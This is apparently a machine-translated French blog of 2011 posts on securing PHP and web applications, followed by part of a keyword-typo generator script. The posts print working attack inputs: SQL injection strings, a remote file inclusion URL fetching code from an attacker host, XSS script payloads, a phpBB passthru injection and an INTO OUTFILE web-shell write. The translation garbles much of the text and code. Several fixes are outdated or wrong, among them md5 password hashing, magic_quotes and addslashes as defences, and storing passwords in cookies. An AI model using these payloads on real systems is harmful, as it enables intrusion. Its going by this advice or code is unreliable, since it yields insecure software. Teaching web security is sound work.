leechoff

Secure PHP

noreply@blogger.com (AMINE) — Sun, 30 Jan 2011 15:30:00 +0000

PHP is a modern language, and powerful, in terms of its possibilities, relatively well developed in terms of security.

Reminder of the possibilities of PHP: interfacing databases, forms processing, reading / writing files, executing system commands, opening and managing network connections, etc..

It is important not to lose sight of the scripts are executed on the server side - what is more web server, so by definition as "exposed" as possible.

The purpose of this paper is a synthesis of "best practices" in security in the PHP scripting.

before you read

A good understanding (at best a good practice) of PHP, databases and the Web is necessary for the proper understanding of this article. If necessary, you can see my ultra-concise PHP.

That said, the purpose here is to be the clearest, most general and, hopefully, the more didactic as possible.

The reader is also assumed to have read the section on security in the online manual, which this article seeks to fill.

Finally, it is perhaps worth remembering that ensuring the security of PHP scripts is no substitute for securing the server on which they run!
Excellent source software has been designed for this purpose (see Securing a heterogeneous network with free tools), feel free to implement ...

cgi or sapi?

Compiling PHP as CGI (Common Gateway Interface) is a practice increasingly rare, we redirect the reader to the page of the manual devoted to this subject.

In addition, a manual of "best practices" in writing CGI scripts is available here.

We will concentrate here on the use, much more widespread, PHP installed as a Web server module, or SAPI (Server Application Programming Interface).

Basic Principles

No, security is not (only) a matter for specialists. It is everyone's business, at any time since the project design, to final use of the program and / or service.

Beyond the purely technical and constantly changing, it is good practice to acquire. All of these practices is the most basic prevention, which can not be overemphasized.

Here is a selection of key principles to remember in all circumstances (non-exhaustive list):

seek to limit the minimum necessary rights and permissions of the user: it is better to hear him complain about his lack of freedom rather than see the damage caused by excessive liberality (universal principle)

never trust the data transmitted by the user (let alone the Internet!), even if you have high pigs together ...
Always test the existence / validity of a file / code to include: and if it was not what you thought?
control client-side data is handy, but as to the illusory security: what's easier than turning off JavaScript? Only a server-side control can claim to be effective.
prefer, where possible, the POST method to GET method: variables in the url, it is bad form;)
Do not confuse complexity and security: if your security system eludes you, consider that you are not safe. Well, anyway, you're never safe.
strive to maintain the server system and PHP interpreter with the latest stable versions: when the disaster takes place, it will be less to criticize you ...

php.ini

Whether you are installing PHP yourself or you go through a host, the security of your scripts depends to a large part of the configuration file php.ini.

Here are the relevant configuration options:

safe_mode

When this option is enabled (safe_mode = on):

- a number of functions are limited or disabled (those dedicated to system commands, etc.). We present a list of functions affected by activation of safe_mode.

- strict checking access permissions of files (based on the UID and GID) is made on the functions involved.

- environment variables are protected.

safe_mode_exec_dir

With this directive, it is possible to specify one or more directories in which the functions affected by the safe_mode will be fully available.

Example: safe_mode_exec_dir = / private_dir /.

safe_mode_allowed_env_vars

Only variables starting with the prefixes listed here can be modified (default: safe_mode_allowed_env_vars = PHP_ and that's fine like that).

safe_mode_protected_env_vars

Through this directive, we can provide a list of environment variables that a script will never change (default: safe_mode_protected_env_vars = LD_LIBRARY_PATH).

disable_fonctions

As its name suggests, this directive will disable the specified functions. Function names must be separated by a comma. This directive is independent of safe_mode.

eg: disable_functions = exec, system, passthru, popen, mail

open_basedir

This directive (independent safe_mode) limits the access permissions to only specified folders (the root being document_root), recursively.

example: "open_basedir = / pub_dir /

display_errors

Phase of development, it is good to have the maximum information about what might interfere with the proper and secure execution of scripts (variables and constants undefined, essentially).

> So: error_reporting = E_ALL

In the production phase, it is wise not to let this kind of error messages displayed on the screen:

Warning: readfile () failed (No such file or directory) in / var / www / perso / confidentiel.php on line 356

> So: display-errors = off

log_errors

Once enabled (log_errors = on), this directive will allow the redirection of error messages (which are banned on-screen display) to the log files (unix) in the event logs (win) or in specified files in the following instructions:

error_log

Specifies the file where messages are error messages.

Example: error_log = / var / php / logs /

register_globals

Lets go global or not the EGPCS (Environment, Get, Post, Cookie, Session).

It is strongly recommended to disable this directive (register_globals = off), even if only to force themselves to make good habits using superglobals.

Briefly, the EGPCS variables inherited methods are no longer available as shown, but accessible only via the corresponding superglobals.

<? Php

if (! $ _SESSION ['auth']) die ("Not authenticated");

allow_url_fopen

Can handle the url as files, hence the door open for bad jokes (see the flaw include ()).

Therefore: allow_url_fopen = off

magic_quotes_gpc

This directive allows to escape (by backslashes) quotes, double quotes, backslashes and NULL character strings from methods GET, POST and Cookies.

Remember that to be passed as a SQL query, these characters must be escaped through the function addslashes ().

Conversely, for displaying a string on the screen without backslashes, it will use the function stripslashes ().

The reason for this directive must be activated (magic_quotes_gpc = on) is that SQL injection attacks (see databases) often use quotes not escaped.

Good article on magic_quotes: phpinfo.net / articles / article_magic-quotes.html.

magic_quotes_runtime

Like its predecessor, this directive allows us to escape the quotes, double quotes, backslashes and NULL character, but character strings from an external resource (database, text box, etc.).

For the same reasons as before: magic_quotes_runtime = on.

include_path

Specifies the path of pages to include: do not forget to inform the Directive (see the flaw include ())!

example: include_path = / var / htaccessed_dir /

file_uploads

Allows the upload of files onto the server via a PHP script. To disable it, of course, if we do not need.

the flaw include ()

This fault has been abundant literature, whereby it has virtually disappeared today.

The goal is to not allow anyone to include any page, whether for access to sensitive data, or simply deface your beautiful page;)

Besides disabling allow_url_fopen, which prohibit the inclusion of remote files, here is a simple way to protect themselves:

<? Php

$ Filename = ". / Page.php";

if (file_exists ($ filename)) include ($ filename);

is an excellent measure to consolidate library files in a protected directory.. htaccess

It is also recommended to avoid giving the extension. Inc files to include. Indeed, if the server is not configured to interpret the file with that extension, it is possible to download stupidly or even more foolishly, that the source code appears on the screen ... Not bad: (

That said, if you have access to your httpd.conf, just add the extension ". Inc" in:

AddType application / x-httpd-php. Phtml. Pwml. Php3. Php4. Php. Php2. Inc

Nor that difficult as that.

Another solution: Add a second extension ... for example ". php":

<? Php

$ Filename .= ". Php";

> Or else, always in httpd.conf, prohibit access to such files:

Order allow, deny

Deny from all

Satisfy All

</ Files>

We see, how to protect themselves are many and varied. The key is to understand, as always, the nature of the danger.

Databases

As well as secure his scripts did not make much sense if the system is not, he strongly advised to be familiar with its DBMS, particularly of course its security mechanisms.

The main concern for database_name displayed on the web comes from SQL injections mentioned above.

Without going into the considerations put forward, just remember that the principle of this type of attack is to pass requests "unexpected" to the DBMS, usually via the form fields, and through clever use of special characters ("'", "%", "*", "#", etc.).

a well-known example of sql injection based on the idea of "cut" with commentary, part of the query execution.

Is a trivial form of identification:

password: <input type="password" name="password"> <br />

> And a query, even banal, using variables from the form:

$ Query = "SELECT * FROM users WHERE login ='".$_ POST ['username'].

"'AND password ='".$_ POST [' password']."'";

As long as the attacker knows a login "sensitive" (without knowing the password), it might as well try to fill the field "login" form:

admin '#

> Our query would be:

$ Query = "SELECT * FROM users WHERE username = 'admin' # '

AND password = 'jun40h ";

What would the performance of the product the following SQL query:

SELECT * FROM users WHERE username = 'admin'

PHP ignoring everything that is after the sign '#' will not pass the last part of the application ... Longer need passwords)

To protect yourself against these annoyances, you have at your disposal an arsenal of functions that allow you to filter (or "parse") the data transmitted not the user.

> It is also recommended hash (using md5 ()) logins and passwords before storing them.

Example:

<? Php

$ Login = trim (htmlspecialchars (addslashes ($ _SESSION ['login']))); / / parse the login

$ Password = trim (htmlspecialchars (addslashes ($ _SESSION ['password']))); / / parsing of password

$ Query = "INSERT INTO customers VALUES (md5 ($ username), md5 ($ password))" / / insert variables computed hash

for all practical purposes, remember that it is essential to create a database user whose rights will be restricted to a minimum (read-only if possible).

If your database contains sensitive data actually, the server must be configured to support connections via SSL (Secure Socket Layer, www.openssl.org).

sessions

The use of sessions is a safe, simple, effective and widely used "draw" visitors (e-commerce sites, forums, etc.).

The principle is simple: assign a unique identifier for each visitor (default PHPSESSID), which will create a file in a temporary directory on the server, the file in which to store the variables generated by the session.

Just so-called (before any output html) session_start () on each page where you want to use these variables.

This can be done in different ways:

- Automatically (via the directive session.auto_start) method recommended.

- Via a form with fields filled will be filtered: method advisable.

- Via the superglobal $ _SESSION variables to retrieve: Always.

- With or without cookies, knowing that if they are handy to keep the session variables the other cookies can be refused by the customer: (

Again, a minimum of vigilance is required to protect individual identifying and preventing possible identity theft.

The first basic actions is to store logins and passwords in a database (and need to reread the previous section).

a good idea is to recover (via the variable superglobal $ _SERVER ['REMOTE_ADDR']) ip of the visitor to ensure its uniqueness:

<? Php

if (isset ($ ip) & & $ ip == $ _SERVER ['REMOTE_ADDR']) {

echo "Welcome home, $ username!"

}

else {

header ('Location: login.php');

}

Web Application Security

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 22:56:00 +0000

Computer security has become increasingly important with the widespread use of Internet in everyday life.

On the Web (the web site to web-based software) it should protect at least a minimum so they are not diverted from their primary use.

We'll take a quick tour of the various attacks that can undergo web applications as well as ways to prevent it. The list is not exhaustive but is intended to help you reduce your worries. These examples are mainly based on the PHP platform - which is the most widely used today - but could easily be replicated if you use ASP, etc. ..

Url malformed
The structure of your site
SQL Injection
Flights sessions
Attacks "man in the middle"
Authentication mechanisms based on Javascript, Java or ActiveX
Cross site scripting
Cookie poisoning
Conclusion

Url malformed

Interest?
These malformed URLs sent to the web server trying to access unauthorized areas of the server or to enforce orders not provided.

Examples of these malformed URLs from Apache logs.
Example
Exemple d'URLS malforméees

XXX.XXX.XXX.XXX - - [14/Jul/2003:13:59:47 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u[...]cbd3%u0%u00=a HTTP/1.0" 404 308 XXX.XXX.XXX.XXX - - [16/Jul/2003:19:34:05+0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321

Comments
These malformed urls are often caused by scripts or viruses to exploit a known vulnerability in your Web server.

What to do?
You do not have much to do there, just keep an updated version of your Web server.

Completion
An example of a virus: Code Red

The structure of your site
Interest?
The files of your website will be able to give valuable information on how to build your application.

This is not a security vulnerability in itself, but may allow such as whether you use php in cgi mod, what is your folder of images you take, etc., etc. ...

In summary, this can our services bringing people to view information that you had not planned to make available, this can help crackers to find flaws in your system; This may cause an increase in bandwidth consumption slowing the Showing your page ...

How do they do?
By analyzing the source of the page:
For example you can see IMG src = ". / Pict / my_file.gif" So you conclude that there is a pict file to the root of the server that contains the images, useful if you want to retrieve all the images from a url
Or with software that do for you compared to a database of signatures (eg Whisker)
Commentary
Someone interested in your pictures for example can connect directly via http client preferred http://votre_site/pict/ and a list of all images that are in your file pict.

What to do?
To protect against an automatic search for common issues, nothing like that to name your files in a way that is unique to you, such as replacing / lib / par. / My_librairies /
To protect against unwanted access files directly, such as images, you have two options:
Put an index.html file in these folders so that a person tries to go directly to this folder is redirected directly to the file. This works with all Web servers, so of course its configuration allows the redirect pages index.html (common case)
If you're running Apache, you can use htaccess files and htpassword to give directives to access a file

Completion
Whisker
Other web scanner N-Stealth
protect_picture class

SQL Injection

Interest?
If your website is a dynamic site, you must have a database server behind which is probably a SQL server. You may be sensitive to such attacks. SQL injection involves the diversion of SQL data from its original purpose. The most obvious example is that of authentication on a site to access your account. You have a login and password that you send using a form script that will check your authentication.
Example?
This script - if it's a php script - could be as follows:

Exemple de script php sensible à l'injection SQL

<?php
$user = $_POST['user'] ;
$password = md5($_POST['password']) ;
$sql = " SELECT * FROM users WHERE login = '$user' AND password ='$password'";
$link = mysql_connect("localhost", "mysql_user", "mysql_password")or die("Could not connect: " . mysql_error());
$result = @mysql_db_query("your_database",$sql);
if (mysql_num_rows($result)!=1)
{
header('location: user_login.php');
}
else{
header('location: user_authentified.php');
}
mysql_close($link);

?>

How?
What happens if $ _POST ['user'] contains "admin", # "? The query becomes SELECT * FROM users WHERE username = 'admin', # 'AND password =''This amounts to SELECT * FROM users WHERE username =' admin ', so to log in as administrator ... This is that an example of SQL injection, see Further Reading for more information.
What to do?
Force the type of your variables with intval, strval, etc ... this will allow you to have the expected type
Use the addslashes and activate magic_quotes_rpc will escape characters that might alter the meaning of your queries
In the example, put
select * from users WHERE username and password =''='';
Do not use the Administrator account the first in your table ...
Maintain the server version of your database up to date.
Etc, etc. ...

Completion
White Paper on SQL Injection

Flights sessions

Interest?
Sessions are used almost everywhere now. They can monitor the client during his visit your site to address this problem in the HTTP protocol is a connectionless protocol (in other words, it is not possible to determine which server to client visits What page) This can be done in two ways:
using session files stored on the server.
using cookies that are stored on the client.
In both cases, the sessions will be used to store personal information from visitors. Able to access these sessions will provide access to sensitive data ... It is not too troublesome if it is in the case of your cart on Amazon that contains your shopping list, but more troublesome when the session contains identification data ...
Example?
Two methods are used to recover a session identifier.
Actively: the hacker trying to retrieve a valid session identifier of a user who just logged in, for example by statistical analysis.
Passively: in the case where the sessions are run on the server side, the links with the session identifier (eg http://mon_site.com/index.php?PHPSESSID=identifiant_session) andTHE link is transmitted to a person Third, this person will
able to retrieve information from the session if it has
not yet expired.
Reducing the duration of the session. plus that will be short, the less you will have a chance to recover a valid identifier of a session still become unused.
safeguard the client's IP address in the session and each use of the session, check if it matches the current client;

How?
In both cases, the user gets a session ID is still valid, and retrieves the data it contains.
What to do?
You can reduce the risk of theft of sessions, by:

<?php
// start session
session_start();
// check if the previous ip client was the same that the current
if (isset($_SESSION['ip_client']) && ($_SESSION['ip_client'] != $_SERVER['REMOTE_ADDR']))
{
   // redirection on the login page
   session_destroy();
   session_start();
   header('Location: login.php');
}
// save the current ip from client
$_SESSION['ip_client'] = $_SERVER['REMOTE_ADDR'];
?>



if you are on php5, you can increase the size of the hash of the session identifier: originally laid this directive is 0 (md5) but you can switch to SHA-1 which is the password hash is 160 bits. Change the corresponding directive in php.ini

; Select a hash function
; 0: MD5 (128 bits)
; 1: SHA-1 (160 bits)

session.hash_function = 1

Completion
White Paper SecureNet Session Riding

Attacks like 'man in the middle'

Interest?
This type of attack is not specific to Web applications; An attack of "man in the middle" is the intrusion of a person in a conversation between two people (client - server)
Example?
What's the point? Password theft of credit card number when paying on a shopping site online, the reasons are vast and varied.
How?
I do not want to do a course on hacking, so I'll let you read up if you want to know more about the modus operandi of hackers.
What to do?
To prevent such attacks, there must be encrypted transaction between the client and the server through an https server, presence server https ensures the encryption of communication between the client and the server and thereby removes the risk of this type of attack. By cons, if the customer does not have a certificate, you can not ensure that the customer who entered the couple login \ password for your admin account is the administrator of the application. The only way to ensure that you are communicating with the right person and that person listens to the communication is that the client and server have a certificate
Completion
Assess the risk of your site? Achilles

Authentication mechanisms based on Javascript, Java or ActiveX

Interest?
You have a website that contains some authentication (admin section, member area, etc ...) and make sure authentication using ActiveX, Java classes or worse javascript? this can cause security holes because the source code, or at least information on the procedures you use to authenticate may be visible to the customer since the files are sent to the client
Example?
What's the point? Password theft of credit card number when paying on a shopping site online, the reasons are vast and varied.
How?
Just analyze the code of your classes or the source code of your javascript in order to understand how is authentication, hence it is easier for someone looking to authenticate your site as administrator or to impersonate someone to access their member area.
What to do?
To prevent such attacks, it is necessary that everything happens on the server side, and only the identification data are from the client side, nothing like a php script for that:) also allows the Java after all is executed on the server side:)
Completion
Do a search on google with java decompiler class and you will understand :)...

Cross site scripting

Interest?
The cross-site scripting - CSS, or - suffers an enormous essort recent years, partly because this type of faults is unknown to developers, and secondly by the development time still limited applications. It involves the injection script - JavaScript, VBScript - dynamic elements in a web server (php, cgi, etc ...). They can address both the customer at the server. Prennons 2 examples, one for the client to another server.
Example?
The example server (script accepting parameters):

<?php
$name = $_GET['NAME'];
echo $name;
?>

<? Php
$ Name = $ _GET ['NAME'];
echo $ name;
?>

This is a classic example of "hello world". Now what happens if the script instead of NAME = NAME = Mary Pierrick or you pass it
NAME = <SCRIPT> print ();</ SCRIPT>
? Printing a window will open. Well this example is silly because it is useless to open a window for printing. Now imagine that you get to view the source code of a php script to make the listing of files, etc., it would certainly be embarrassing ... : (
The example on the client (as in mail):
CSS attacks on the client are typically used to retrieve information from customers such as session ids, passwords, cookie values, etc. ... These attacks are usually made through an email sent to the person again containing CSS in a link. Take the example of a forum administrator can scrupulous, who receives an email indicating that the page does not <a href = "http://www.forum_en_question.com/index.php?forum = <SCRIPT > alert ("I just recover your cookies") </ SCRIPT> & page = 2 "> http://www.forum_en_question.com/index.php?forum=news&page=2 </ a> The administrator who not aware of this type of vulnerability will click on the link, and thus activate the script.

How?
With the information collected, the attacker can install a virus, login as administrator, etc ...
What to do?
To prevent such attacks, you must:
Always be on guard:)
Enable magic_quote_rpc which may escape some of the values passed as parameters
Protecting the variables displayed by htmlentities and htmlspecialchars tags that will idle scripts that may be present

Cookie poisoning

Interest?
Cookies will allow you to customize the application according to the customer. These are small files sent to the client containing personalized information such as passwords, the color screen of the site, or I do not know what else. They are only available through the site that you sent it to say that the cookie sent by Google may not be read by another site, and vice versa. Only when the data contained in cookies are sensitive (password, level of identification and all that you go through the head), because the cookie is stored at the client it can be changed. The cookie poisoning attack is to modify the cookie data to bypass the security mechanisms.
Example?
This example comes from Webcohort, and is based on the example
a commercial site, one of the typical application of cookies
with the famous cart:

GET /store/buy.asp?checkout=yes HTTP/1.0
Host: www.onlineshop.com
Accept: */*
Referrer: http://www.onlineshop.com/showprods.asp
Cookie: SESSIONID=570321ASDD23SA2321; BasketSize=3;
Item1=2892; Item2=3210; Item3=9942;

TotalPrice=16044;

GET / store / buy.asp? Checkout = yes HTTP/1.0
Host: www.onlineshop.com
Accept: * / *
Referrer: http://www.onlineshop.com/showprods.asp
Cookie: SessionID = 570321ASDD23SA2321; BasketSize = 3;
Item1 = 2892; Item2 = 3210; Item3 = 9942;
TotalPrice = 16044;
How?
In this example, the cookie is sent by the page buy.asp onlineshop.com site. It contains both session ID of the user and the customer's shopping cart: shopping cart that contains three items with their ID and the total price that the user has to pay. Now if the user edits his cookie, he may change his total to pay for a small discount:)
What to do?
To prevent such attacks, you must:
Use sessions on the server side, knowing what may be as susceptible to attacks (see session hijacking)
Encrypt your data in the cookie with strong encryption, like DES, 3DES or better.
Reduce the life of your cookie to a minimum if you do not really need.
In general, avoid storing information at the client if they prove to be sensitive
WebCohort
Another study of cookie poisoning

Conclusion
I hope this tutorial has enabled you to understand some of the potential risks of web applications and what are the steps you may want to make them safer. Only the risk 0 does not exist, be aware of this.
Remember that the only limit that can meet a pirate is that of his imagination. Although the majority of quasi hackers are script kiddies, the fact remains that a good hacker will find flaws that were not yet updated. The best way to ensure a good level of protection is to regularly check your safety through safety audits, to keep you informed of various updates vulnerabilities, exploits, etc. ...

PHP flaws to avoid

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 22:17:00 +0000

Securing PHP scripts is an important step to be taken into account in any site design or script, simple or complex.
PHP can already configure properly if you eliminate a lot of security problems (we will talk about this particular register_globals). We then address some practical examples commonly used in some websites and it is important not to do. Finally we discuss some techniques of concealment (Url Rewriting, force download) to hide files and URLs.

The register_globals:
PHP is finally configured with the register_globals to off by default. You can disable register_globals via php.ini, find the line register_globals and set it to Off. You can also go through. Htaccess file, you should then add the following line: php_flag register_globals off. This will disable register_globals, which are a real scourge for the security of a script.
We will now discuss some examples don'ts and how to correct potential vulnerabilities:
The flaw include:
A simple example of this flaw: Most sites have this vulnerability using the style monsite.com url / index.php? Page = xxxxx or xxxxx is a page that will be included like this:
<? Php if (isset ($ _GET ['page'])) { include $ _GET ['page'].'. php'; } else { include 'accueil.php'; } ?>
Now it is sufficient that the attacker up a page entitled example page on its server. He then went to the site affected by the fault, and enters the following url: monsite.com / index.php? Page = http://autre_site.com/page. The page is not executed by PHP on the remote site, it will be executed on the site with the fault. So you can imagine the consequences that may result ... To counter this flaw we simply use the function file_exists () (in PHP5 this attention is not necessarily valid, make sure you have allow_url_fopen to Off in php.ini. Here is the corrected code:
<? Php if (isset ($ _GET ['page']) AND file_exists ($ _GET ['page'].'. php')) { include $ _GET ['page'].'. php'; } else { include 'accueil.php'; } ?>
Attention now to the flaw in your site, ie a visitor includes a page on your site for which he has no access rights back in a directory for example ... You can use it to counter the regular expressions by removing the special characters: forward slash, point, and the backslash ... which could take place in the url.
The fault code and HTML forms:
It is common now to ask users what goes through your head, and then display this information. A malicious user could then put the HTML code to deface your site (nothing to fear for the given, just for presentation).
Here is an example of the current form:
<form action="page.php" method="post"> <p> <textarea name="message"> </ textarea> <input type="submit" value="Envoyer" /> </ p> </ Form>
Here is an example of PHP code that retrieves the value of the typed message and displays it on the web page:
<? Php if (isset ($ _POST ['message'])) { echo $ _POST ['message'] / / It could very well have to store the message, that would be returned to the same } ?>
Now imagine that the user enters any html code, he does what he wants with the presentation of your site, and can even use javascript to redirect the user anywhere.We'll use the function htmlentities () to fix the flaw:
<? Php if (isset ($ _POST ['message'])) { echo htmlentities ($ _POST ['message']) / / The HTML characters are now displayed and not interpreted } ?>
Vulnerabilities like SQL injection:
The vulnerabilities include SQL injection to execute arbitrary queries on a database.In general, these vulnerabilities are used through a form. Imagine that we have a table that our members and request to see if a member is identified as follows:
mysql_query ("SELECT login, password FROM members WHERE login ='".$_ POST ['login password ='".$_']."' AND POST [' password']."'");
login and password are two fields of a form. Now imagine that we rentriions this value in the username: 'OR 1 = 1 ") #. The motion carried by PHP becomes:
mysql_query ("SELECT login, password FROM members WHERE username =''OR 1 = 1");
As the condition OR 1 = 1 is always true, the query is executed and the member can connect without any ID.
To remedy this flaw, we will escape special characters using mysql_real_escape_string (this is also valid for insertion into a database):
The magic_quotes if enabled will automatically escape characters, that is why we should always look if this feature is active before escaping anything. Here is the corrected code:

<?php /**
* Si des slashes ont été ajoutés via les magic quotes, on les enlève
*/ if(get_magic_quotes_gpc()===1)
{
     $_POST['login'] = stripslashes($_POST['login']);
     $_POST['passe'] = stripslashes($_POST['passe']);
}
/**
* On protège les chaînes
*/

     $_POST['login'] = mysql_real_escape_string($_POST['login']);
     $_POST['passe'] = mysql_real_escape_string($_POST['passe']);
/**
* On effectue la requête
*/
     mysql_query("SELECT login,passe FROM membres WHERE login='".$_POST['login']."' AND passe='".$_POST['passe']."'");?>

Top 7 PHP Security Blunders

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 21:41:00 +0000

This topic has pretensions to group the most common PHP vulnerabilities and themost dangerous. I will try to hold a speech accessible to insiders as beginners.Allusions to PHP functions can be made, this is not the role of this subject that youlearn to use them, so I invite you to refer to the PHP documentation for the terms thatyou would be a problem.

These texts are copyright free, for my part, if you want to use on your site or forum,thank you for showing the origin, and (or) author (s).

1. The variables in the URL
2. Defects redirection
3. Faille Include ()
4. XSS vulnerabilities
5. Faults Cookies
6. Faille urlencode ()
7. Require fault ()
8. Tips and tricks to stay dry

############################# N°1 #############################

1. Variables air gaffe to air currents.
A script is potentially exploitable when a visitor does can act freely on your variables, either when they pass through a URL, as follows: http://www.site.com/admin.php?loggin=1 or when your IDs connection are contained in your URL (ie a URL that looks like http://www.site.com/admin.php?loggin=arthur&pass=toto). From the moment a person has access to sensitive information or can modify a variable in your URL, which can affect its condition of mere visitor through your site, you need to estimate risk.
Why? Although this may seem obvious to the greater part of the coders, this vulnerability is sometimes found on the net, see (and there is more severe) in scripts installable on your sites, so make sure that no sensitive variable or control access to protected page not found in your URLs.
How to remedy? The use of cookies or sessions is strongly recommended in this case: It will save you having to drag a variable "sensitive" in your URLs and your connections to your pages will be protected in a transparent manner, either by passing your login information between pages with a session ID, either a file containing your credentials on your computer to be read by your site.

############################# N°2 #############################

2. Redirection? Not a solution.

When you put at the disposal of your members private access, they must log a malicious person can still gain access to your protected areas if the only protection is automatic redirection. What kind of codes are infected?

If ($ password! == "Pouletgrille") {print '<meta http-equiv="refresh" content="1; URL=?page=connexion">';}

Why? What will happen when the Piratini will enter a bad password? It will happen on your page not protected and will be immediately redirected to an error page, and this is the error: The visitor can still block the browser, or save your page, and the entire vera your "protected", where it will perform its misdeeds.

How about it? It's simple, takes any case that the contents of your protected area appears never, NEVER, NEVER, JAMAIIIIS page on your visitors, not even a microsecond, the easiest way to fix this problem is to act as follows:

If ($ password == "Pouletgrille") {Print'Insérez here inside your admin section '} else {print'Erreur connection! View the form of identification ';}

It is a basic method (probably too much.) But it has the merit of protecting you.

############################# N°3 #############################

3. The flaw Include ()

Famous as widely used, the flaw allows the attacker to include taking full control of your site: Add, delete or modify files, view the contents (password, attention), or even worse, store malware on your webspace if your code looks in this configuration, you worry:

<? Php include ("$ page")?>

Pourqoi? This way, you integrate one page to another page, for example, through this link: http://www.votresite.com/index.php?page=accueil.php. This method fills his role, you have the requested file on your page, and sheep are kept. Well no! Sheep are not kept well, look, there is already a knockout, and the others will soon be attacked, how? The attacker can also integrate its malicious pages (like this: http://www.votresite.com/?page=http://www.sitedupirate.com/script.txt, and as PHP is a wonderful language, it may do ANYTHING.

How about it? There are several solutions: Here is a list of alternatives most currents

############################# N°4 #############################

4. The XSS? It gives me herpes!

If you offer your visitors a guestbook, a forum (first version of phpBB, warning.) Or a space where they can freely post messages on your site, this area is potentially dangerous. If entering this code in the space where visitors can post a message, a pop-up window opens, you worry (this test does not cost anything to do, but can be very important.)

Hello! <script> window.open ("http://www.monsite.com/) </ script>

Why? You are victims of XSS, but what exactly is this creature here? The exploitation of a security bug that allows your visitors to execute scripts javascript, for example, what can you do with it? Steal the contents of your login cookie (Yabon, we will be able to connect to your forum under your account or your site in the administration), open up the free advertising on your site, redirect visitors to pages infected by viruses, only good things full of iron and calcium.

How about it? There are many ways to solve this problem: Define your own text as the HTML (like this: $ message = htmlspecialchars ($ message), so the javascript code is not interpreted and will be written in html, is the simplest method, the most widespread and cleanest.), or inhibit the use of "javascript" (and, no javascript can be executed), as follows: $ message = str_replace ("java script :","",$ message); (for example, the forum Pcinpact decided to impose a space between java and script, in addition to imposing writing messages in html.

############################# N°5 #############################

5. The flaw cookies? Nay!

Cookies allow a loophole in a very special configuration, using a login cookie to transform into that of someone else.

Why? If the connection to the member section, the individual logs in with their username and password, then get her little cookie (and do not get that if he entered the correct credentials) and then see his username in the cookie, and only the user name appear, the script performs its role, your pages will verify that the cookie exists, and uses the user name for its access rights, but there is a problem: The user can just malicious outsmart your safety as well, he certainly made good use of identifiers, so it has received a cookie automatically generated, and all that, but once it's the cookie? He changed his name, and hop hop hop, neither one nor two, he's with your username, and can do what he pleases.

How to solve this problem? By storing the username and password in cookies, so even if the person changes the username, the password does not always agree. The flaw cookie can often be coupled with XSS can login to your member area, even if your password is encrypted. It is therefore recommended to link your security system with verification IP reloging ask the member if a conflict of IP database and the one that wants to connect.

############################# N°6 #############################

6. The flaw urldecode () in SQL queries. (By Savory)

Cons used phpbb and phpmyadmin now.

For example to quote the code of phpbb viewtopic:

Highlight_match $ = $ highlight ='';

if (isset ($ HTTP_GET_VARS ['highlight']))

{

/ / Split words and phrases

$ Words = explode ('', trim (htmlspecialchars (urldecode ($ HTTP_GET_VARS ['highlight']))));

for ($ i = 0; $ i <sizeof ($ words); $ i + +)

if url encoded 'in 27% and then re-urlencode% in 2527 we can inject a' nose of the application and then inject php code.

For example to quote one of santy [...] highlight =% 2527.passthru ($ rush).% 2527 & id = rush

I'll try to find additional information for this flaw and explain more. (Or if someone wants to stick to it ..)

############################# N°7 #############################

7. The flaw require ()

Like the include quoted above except that it is sensitive to gender null byte% 00

If for example we require ("/ home / web / lib /" $. Trick.. "Php");

poisoner can trick via cookie / post / get% 00 and append it to the end to remove the ". php" therefore it is absolutely recommended to use require_once and static variables.

After that is the sql injection can lead up to an invasion of the bone:

The example speaks for itself

1 'OR 1 = 1 INTO OUTFILE' / var / www / htdocs / site / kikoo.php "FIELDS TERMINATED BY '<? Include ($ p); exit ;?>'/*

we can replace 'by "and URLencode <? include ($ p) exit;?>

in% 3C% 3Finclude% 28% 24p% 29% 3B% 3F% 3Bexit% 3E

hop on to a factory include a condition to know the relative path wwwroot can be spotted by bugger page.

I'll try to find additional information for this flaw and explain more. (Or if someone wants to stick to it ..)

############################# N°8 #############################

8. Tips and Tricks

Follow OSHA

Always use <? Php (and not <?) For reasons of portability and compatibility with future versions of php.

Do not let error messages

Avoid getting in creating accessible pages: You must be the only one to have access to error messages. (Or use error_reporting (0);)

Check the integrity of files used

Always use the basedir (); to be sure that the files in the URLs are in the same directory (and not imported from other exotic locations)

Encode all passwords

Sample Procedure:

In the database, if you have user account, do not write their passwords "in clear":

use the command md5 ():

$ Mdp_chiffre = md5 ($ password);

To check the password of a user at its connection example, do:

$ A_verifier = md5 ($ ce_qui_a_ete_saisi);

and compare what you get with what is stored in the database. Thus, anyone accessing the contents of the user table will not have their password provided. (Note: instead of md5 (), you can use mcrypt, mhash, crypt, etc.).

#################################################################

Finally, remember that security holes are not necessarily your fault, they can be found in the pre-created scripts that you install, and they are all the more dangerous a hacker can know the code exact source of these scripts, so check everything that comes into your FTP.

Php script generator typos

noreply@blogger.com (AMINE) — Sat, 29 Jan 2011 20:59:00 +0000

This php script generates typos for a given keyword.
This php script will help you increase traffic to your web pages by getting visitors whomake mistakes during their search engines.

////////////////////////Modifier ci-dessous///////////////////
// Générer les fautes de frappe pour ce mot :
$kw = "google";
// résultats :
echo "<h1>Fautes de frappes</h1>";
echo "<h2>Oubli de lettres : </h2>";
echo oubli_lettres($kw);
echo "<h2>Inversion de lettres : </h2>";
echo inversion_lettres($kw);
echo "<h2>Doubler lettres : </h2>";
echo doubler_lettres($kw);
echo "<h2>Fautes de frappe courantes : </h2>";
echo erreur_lettres_proches($kw);

////////////////////////Fonctions/////////////////////////
//oubli de lettres
function oubli_lettres($sld)
{
$array = preg_split('//',$sld);
$size = sizeof($array);
$size = $size - 1;
for ($i = 1; $i < $size; $i++)
{
if (!strcmp($array[ $i]," ")) { continue; }
for ($x = 1; $x < $size; $x++)
{
if ($x == $i) { continue; }
$temp = $temp . $array[ $x];
}
print "$temp ";
$temp = "";
}
}

//Inversion lettres
function inversion_lettres($sld)
{

$array = preg_split('//',$sld);
$size = sizeof($array);
$size = $size - 1;

for ($i = 1; $i < $size; $i++)
{
if (!strcmp($array[ $i]," ")) { continue; }
if (!strcmp($array[ $i],$array[ $i+1])) { continue; }
for ($x = 1; $x < $size; $x++)
{
if (($x == $i) and ($i < $size)) { $temp = $temp . $array[ $x+1]; }
else if ($x == ($i+1)) {$temp = $temp . $array[ $x-1]; }
else { $temp = $temp . $array[ $x]; }
}
print "$temp ";
